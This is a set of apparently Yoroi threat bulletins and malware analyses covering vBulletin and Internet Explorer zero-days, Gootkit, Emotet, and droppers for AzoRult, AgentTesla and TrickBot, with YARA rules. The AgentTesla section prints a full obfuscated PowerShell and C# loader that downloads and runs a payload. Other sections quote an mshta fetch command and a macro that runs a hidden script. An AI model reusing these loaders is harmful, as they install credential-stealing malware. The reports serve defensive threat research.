Warning: Vulnerabilità 0-day su vBulletin

Proto: N070919.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di una vulnerabilità 0day all’interno di vBulletin, una tra le principali tecnologie di riferimento per la creazione di forum specialistici e community online. La criticità è nota con l’identificativo CVE-2019-16759. 

Nei giorni scorsi, è stato rilasciato pubblicamente un exploit funzionante in grado di eseguire codice arbitrario all’interno del server bersaglio per via di gravi lacune durante la gestione delle richieste Ajax nel modulo “widget_php” . Tale circostanza può essere sfruttata da attaccanti remoti e non autenticati per accedere abusivamente ai sistemi, propagare automaticamente worm e malware all’interno di essi e trafugarne il contenuto, inclusi account e credenziali utente.

Il Produttore ha confermato la problematica rilasciando inoltre patch di sicurezza per le versioni vBulletin 5.5.2, 5.5.3 e 5.5.4. Pertanto Yoroi consiglia di applicare tali aggiornamenti alle eventuali istanzanze vBulletin in uso presso le Vostre organizzazioni. Consiglia inoltre di valutare l’adozione di una policy sull’utilizzo degli indirizzi email aziendali all’interno di forum e community, al fine di limitarne l’eventuale coinvolgimento in caso di data breach su terze parti.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Vulnerabilità 0-day su Internet Explorer

Proto: N060919.

Con la presente Yoroi desidera informarLa riguardo al recente rilascio di importanti aggiornamenti di sicurezza per la risoluzione di una vulnerabilità 0day del browser Internet Explorer. La criticità è nota con l’identificativo CVE-2019-1367. 

A causa di lacune nella gestione della memoria all’interno del motore di scripting dello storico browser di Microsoft, un attaccante di rete può essere in grado di eseguire codice arbitrario nella macchina vittima in seguito alla sola navigazione in portali web malevoli o compromessi. Tale circostanza rappresenta uno scenario di rischio in quanto sfruttabile in schemi di attacco di tipo Watering-Hole nel corso di campagne di attacco mirate, oppure attraverso Exploit-Kit.

Il Vendor ha confermato la problematica attraverso un apposito bollettino, rilasciando inoltre patch di sicurezza al di fuori del normale ciclo di aggiornamento per le versioni:

Benchè non siano ancora noti exploit pubblici o attacchi su larga scala,  è stato confermato dai ricercatori del GTAG lo sfruttamento della vulnerabilità in attività di attacco 0day potenzialmente mirate. Pertanto, Yoroi consiglia di pianificare l’applicazione degli aggiornamenti resi disponibili dal produttore ed, in alternativa, di valutare l’applicazione delle restrizioni di accesso al motore di scripting JScript.dll suggerite dal Produttore.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

APT or not APT? What's Behind the Aggah Campaign

Introduction

During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports. 

But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.

Technical Analysis

Hash7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
ThreatExcel document Dropper
Brief DescriptionFirst stage of Aggah campaign
Ssdeep768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page

Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. 

Figure 5. Deobfuscation process

Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. 

The AzoRult Payload

Hash37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
ThreatAzoRult 
Brief DescriptionAzoRult final payload
Ssdeep3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. 

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2

Conclusion

We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.

The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.

Indicator of Compromise

Yara Rules

import "pe"
rule Mana_Aggah_campaign_excel_dropper_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign Excel dropper"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29}
   		 $a2 = {61 70 74 77 4D 71 55 45 27}

    condition:
   	 all of them
}


rule Mana_Aggah_campaign_injector_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign DLL injector"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {4D 5A}
   		 $a2 = {93 E5 21 3F 59 AE}
   		 $a3 = {11 08 28 22}
   		 $a4 = "v2.0.507"
   		 $a5 = {E2 80 8C E2 80}
   		 $a6 = {81 AC E2 81 AF E2 80 AE}
   		 $a7 = {E2 81 AA E2 80}
   		 $a8 = {81 AF E2 80 AA}
   		 $a9 = {81 AC E2 81 AF E2 80 AE}
   		 $a10 = {C5 C7 4C 9E 65 A5 B6 42}

    condition:
   	 6 of ($a*)
}

rule Mana_Aggah_campaign_AzoRult_Sep_2019{

    meta:
      description = "Yara Rule for Mana campaign AzoRult sample"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-09-18"
      tlp = "white"
      category = "informational"

    strings:
		$h1 = {4D 5A 50}
		$bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8}
		$bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8}
		$bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8}
		$s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide
		$s2 = "moz_historyvisits.visit_date" ascii wide
		$s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide
	condition:
		$h1 and all of ($s*) and 1 of ($bob*)
}

This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB

Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Introduction

Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

Hash72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
ThreatMacro Dropper
Brief DescriptionAgent Tesla Doc Macro Dropper
Ssdeep768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document

Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

powershell -WindowStyle Hidden 
function b72f3 {    param($l74b5)    $l557ad = 'bc9b4';$l63acc = '';    for ($i = 0; $i -lt $l74b5.length; $i+=2) {        $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16);        $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]);        }    return $l63acc;}
$k61b35e = '1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b5703425e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f';$k61b35e2 = b72f3($k61b35e);
Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;

public class p99a3fb{ 
 [DllImport("kernel32",EntryPoint="GetProcAddress")] 

 public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
 [DllImport("kernel32", EntryPoint = "LoadLibrary")] public static extern IntPtr ud1451(string j4d4b5);
 [DllImport("kernel32", EntryPoint="VirtualProtect")] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
 [DllImport("Kernel32.dll", EntryPoint="RtlMoveMemory", SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
 
 public static int o81f67(){ 
	IntPtr eef257 = ud1451(b72f3("030e4a0b1a060f55"));
	if(eef257==IntPtr.Zero){goto l255c;} 
	IntPtr bca6aa=va46a7(eef257,b72f3("230e4a0b67010257204104055c10")); 	
 	if(bca6aa==IntPtr.Zero){goto l255c;} 
	UIntPtr de6f3=(UIntPtr)5;
 	uint d5c61=0;
 	if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  	Byte[] e197fb8={0x31,0xff,0x90};
	 IntPtr kee39a=Marshal.AllocHGlobal(3);
	 Marshal.Copy(e197fb8,0,kee39a,3);
	 jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
	 l255c:  WebClient rd1389=new WebClient();
	 string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+"\\x3a81a"+b72f3("4c064107");
	rd1389.DownloadFile(b72f3("0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07"),ybea79);
	 ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
	 Process.Start(n52cefe);
	 return 0;
 } 

 public static string b72f3(string s1f74a){ 
	string af474b5="bc9b4";
	string ud1451=String.Empty;
	 for(int i=0;
	i<s1f74a.Length;
	i+=2){ 
	byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
		 ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
 	} return ud1451;
 }
}

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

Hash51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
ThreatAgent Tesla Loader
Brief DescriptionAgent Tesla .NET C# loader
Ssdeep12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate "creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind". This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the "swety.dll" library, the module in charge to detect the analysis environment.

The “Swety” Module

Hasha0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
ThreatSwety evasion module
Brief Description.NET Swety evasion module
Ssdeep1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
ThreatAgent Tesla
Brief DescriptionAgent Tesla Payload
Ssdeep6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick

Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “[email protected]”. 

Figure 12: SMPT communication

Conclusion

As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these "commodity tools" still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Indicators of Compromise

Hashes

DropUrl:

C2 (smtp)

Persistence Mechanism

Yara Rules

rule AgentTesla_MacroDropper_1909 {
    meta:
      description = "Yara rule for AgentTesla Macro DOC Dropper 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 6D EF 0D 0F 32 2A A4 A0 8D 0A}
	  $a2 = {7B D6 CB 41 C7 28 48 4D ED A5}
	  $a3 = {5F AF B6 16 6C A9 3A 0C 5F D8 5C}
    condition:
      uint16(0) == 0x4B50 and all of them
}
rule AgentTesla_loader_1909 {
    meta:
      description = "Yara rule for AgentTesla loader 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {3D D2 5B 5B 7B 9B EF 4C BB}
	  $a2 = {8E AF 2D D0 BD 78 5C D1 15}
	  $a3 = "F7yYSv5wCAK/4YCGT+bQ==" ascii wide
    condition:
      uint16(0) == 0x5A4D and pe.timestamp == 0x25E8088E and all of them

}

This article was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB.

Nuove Operazioni di Attacco Gootkit

Proto: N050919.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una nuova campagna di attacco diretta ad Aziende ed Utenti italiani. Gli attacchi mirano a compromettere gli utenti bersaglio con impianti malware della famiglia Gootkit (TH-106). La minaccia è in grado di dare accesso remoto agli attaccanti, intercettare ed alterare il traffico di navigazione utente verso alcuni dei principali portali di bancari italiani e francesi. Sono infatti stati trovati riferimenti a gruppi quali Unicredit, In-Bank, Cedacri, Intesa Sanpaolo, Groupe Banque Populaire, Poste Italiane, Crédit Agricole, CariParma, Crédit Coopératif, BNP Paribas, Caisse D'Epargne, Banco BPM e Raiffeisen all’interno delle configurazioni del malware.

Di seguito si riportano gli indicatori di compromissione collezionati durante le analisi:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Ritorno delle Campagne di Attacco Emotet

Proto: N040919.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di nuove attività di attacco legate alla minaccia Emotet (TH-168). Gli attacchi di questa botnet sono ripresi dopo uno stop durato circa due mesi. Ad oggi, stanno infatti circolando nuovi messaggi di posta malevoli diretti ad organizzazioni ed utenti in tutto il mondo, i quali contengono documenti Office in grado di scaricare ed installare varianti del malware Emotet sulle macchine vittima. Tale minaccia è in grado di trafugare password  e digitazioni utente, intercettare ed alterare il traffico di navigazione e fornire accesso remoto sulle reti compromesse ai cyber-criminali.

Figura. Esempio documento malevolo

Di seguito si riportano gli indicatori di compromissione collezionati durante le analisi:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Dissecting the 10k Lines of the new TrickBot Dropper

Introduction

TrickBot it is one of the best known Banking Trojan which has been infecting victims since 2016, it is considered a cyber-crime tool. But nowadays defining it a “Banking Trojan” is quite reductive: during the last years its modularity brought the malware to a higher level. In fact it can be considered a sort of malicious implant able to not only commit bank-related crimes, but also providing tools and mechanism for advanced attackers to penetrate within company networks. For instance, it has been used by several gangs to inoculate Ryuk ransomware within the core servers infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report, we analyzed one of the recently weaponized Word documents spread by TrickBot operators all around the globe. Revealing an interesting dropper composed by several thousand highly obfuscated Lines of Code and abusing the so-called ADS (Alternate Data Stream).

Technical Analysis

Hash07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
ThreatDropper
Brief DescriptionTrickBot document dropper
Ssdeep1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial, trick. The attacker simply used a white font to hide the malicious content from the unaware user (and from the endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This is code will be executed in the next stages of the infection chain, but before digging the JavaScript code, we’ll explore the macro code embedded into the malicious document.

Figure 1. Content of Word document

Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is automatically executed after the opening of the Word document. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1” local file

Figure 3. Macro code embedded in the malicious document

Exploring the folder “\Word\STARTUP” we noticed the “stati_stic.inf” file counts zero bytes. Actually, the dropper abused an old Windows File System feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional stream. A known techniques, T1096 on Mitre Att&ck framework, can be simply used by concatenating the colon operator and the stream name to the filename during any writing or reading operation. So, we extracted the content of the stream through a simple Powershell command.

Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the initial Word document hidden content. The malicious control flow resumes with the “Document_Close()” function, in which the “StripAllHidden()” function is invoked. This routine deletes all the hidden information embedded into the document by the attacker, probably with the intent to hide any traces unintentionally embedded during the development phase. Its code has probably been borrowed from some public snippets such as the one included at the link

After that, the macro code executes the data just written into the “com1” data stream. Since the stream contains JavaScript code, it will be executed through WScript utility using the following instructions:

CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT" & GroundOn, 0

Which, after a little cleanup, becomes:

CallByName CreateObject("wScript.Shell"), "Run", VbMethod, “powershell wscript /e:jscript “c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1””, 0

The JavaScript Dropper

Now, let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variable names and some comments, along with chunks of junk instructions resulting in a potentially low detection rate.

Figure 5. Example of the sample detection rate

At first glance, the attacker purpose seems fulfilled. The script is not easily readable and appears extremely complex: almost 10 thousand lines of code and over 1800 anonymous function declared in the code.

Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscated every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it returns always zero value.   

Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

jnabron(102, ‘Ch’)

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function. Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.

Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpack its real instructions, causing a tedious work to the analyst who has to understand the malicious intents of the script. As shown in the following figure, tens of code lines result in a single instruction containing the real value will be included in the final script.

Figure 9. Example of de-obfuscation process

After a de-obfuscation phase, some useful values are visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.

Figure 10. C2 checkin code

Analyzing this hidden control flow we discover the first action to be performed is the gathering of particular system information.  This is done through the WMI interface, specifying a particular WQL query and invoking the “ExecQuery” function to retrieve:

Figure 11. Code used to extract information about system

These information are then sent to the command and control server during the check-in phase of the Javascript loader, along with the list of running processes.

Figure 12. Network traffic

Moreover, the script is able to gather a list of all files which have one of the extensions chosen by the attacker: PDF files, Office, Word and Excel documents. The result of this search is then written on a local file into the “%TEMP%” folder, and later uploaded to the attacker infrastructure.

Figure 13. Code to extract absolute paths from specific file types

Conclusion

TrickBot is one of the most active Banking Trojan today, it is considered to be part of Cyber Crime arsenal and it is still under development. The malware, first appeared in 2016, during the last years adds functionalities and exploit capabilities such as  the infamous SMB Vulnerability (MS17-010) including EthernalBlue, EthernalRomance or EthernalChampion.

The analyzed dropper contains a highly obfuscated JavaScript code counting about 10 thousand Lines of Code. This new infection chain structure represents an increased threat to companies and users, it can achieve low detection rates enabling the unnoticed delivery of TrickBot payload, which can be really dangerous for its victims: just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks all across the company IT infrastructure. 

Indicator of Compromise

Yara-Rules

import "pe"

rule TrickBot_Dropper_August_2019 {
    meta:
      description = "Yara rule for TrickBot dropper - August variant "
      author = "Yoroi - ZLab"
      last_updated = "2019-09-09"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {0E E3 4E B0 36 C5 A5 32 62 37 C3 1E 86 F3 44 2B}
      $a2 = {E8 E3 9E 31 3D 37 78 12 89 07 DB 71 B2 92 2E B8}
	  $b1 = /\([^,]*,'Ch'\)/
    condition:
      all of ($a*) or $b1
}

rule TrickBot_August_2019 {
    meta:
      description = "Yara rule for TrickBot - August variant "
      author = "Yoroi - ZLab"
      last_updated = "2019-09-09"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = "VIEW 4 ME UK LIMITED1" wide ascii
	  $a2 = "mfAACEnc.dll" wide ascii
    condition:
      all of them and pe.number_of_resources == 7  
}

